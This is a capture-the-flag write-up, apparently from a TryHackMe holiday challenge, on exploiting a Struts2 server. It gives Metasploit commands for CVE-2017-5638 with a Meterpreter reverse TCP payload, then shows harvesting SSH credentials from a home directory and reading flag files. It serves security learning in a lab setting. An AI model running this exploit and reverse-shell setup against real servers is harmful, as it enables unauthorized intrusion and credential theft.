﻿# Day 10 - Metasploit-a-ho-ho-ho
I GOT TO USE **METASPLOIT**!! xD

## Gaining the shell
So before I begin to venture in the box for the flags, I need to get a shell. Since I know this challenge would require exploiting a vulnerable _Struts2_ server, I started looking for recent _Struts2_ CVEs. And sure I found a recent one, **CVE-2017-5638**. 
Now let's search in **metasploit** about this vulnerability. Found it under the name `multi/http/struts2_content_type_ongl`.  Enable it via 
```metasploit
use multi/http/struts2_content_type_ongl
```
Now it's time for selecting a payload. List all of them via `show payloads`. I ended up using the `linux/x64/meterpreter/reverse_tcp` reverse TCP shell payload. Enabling it via 
```metasploit
use PAYLOAD linux/x64/meterpreter/reverse_tcp
```
Now all that's left now is to set remote host address and remote host port and setting-up the connect-back address. Set them via
```metasploit
set RHOSTS <machine ip>
set RPORT 80
set LHOST <TryHackMe internal IP>
```
Once done, a simple `run`/`exploit` will trigger the automatic exploitation and drop us into a shell.

> Important note: If you are doing this from a VM, you'll need to keep in mind that VMs don't manage the NICs of your machine and thus can't use the same internal IP as your machine's. A simple solution is to use a `Bridged Adapter` for your VM. That way your VM can directly access the NIC of your system and communicate with the servers using the provided VPN IP. Also, you'll need to start **OpenVPN** inside your VM. 

## Getting the first flag
Okay. Now that I'm inside the server, I can start hunting for the flags. The first challenge makes it look like the first flag will in the current directory. So let's look around.
A quick `pwd` shows we are in the _/usr/local/tomcat_ directory, which immediately makes the _webapps_ directory interesting. 
Let's dive into that rabbit hole. The _webapps_ directory has a sub-directory called _ROOT_ which contains the website's source code and our first flag file `ThisIsFlag1.txt`.

## Hunting for the password.
Next we want _santa_'s password. What's better than looking inside _santa_'s home directory. Went there and found the credentials in the file `ssh-creds.txt`. Got the password alright. Submit the password for the flag. And then connected to the machine using `ssh`

## Finding the people
Now after a succesful SSH into the machine with _santa_'s login credentials, I looked around for the aforementioned list. They were placed right in the home directory. Now to extract the name, a little bit of shell-fu was performed.
```bash
head -n 148 naughty_list.txt | tail -n 1
head -n 52 nice_list.txt | tail -n 1
```
> Written with [StackEdit](https://stackedit.io/).
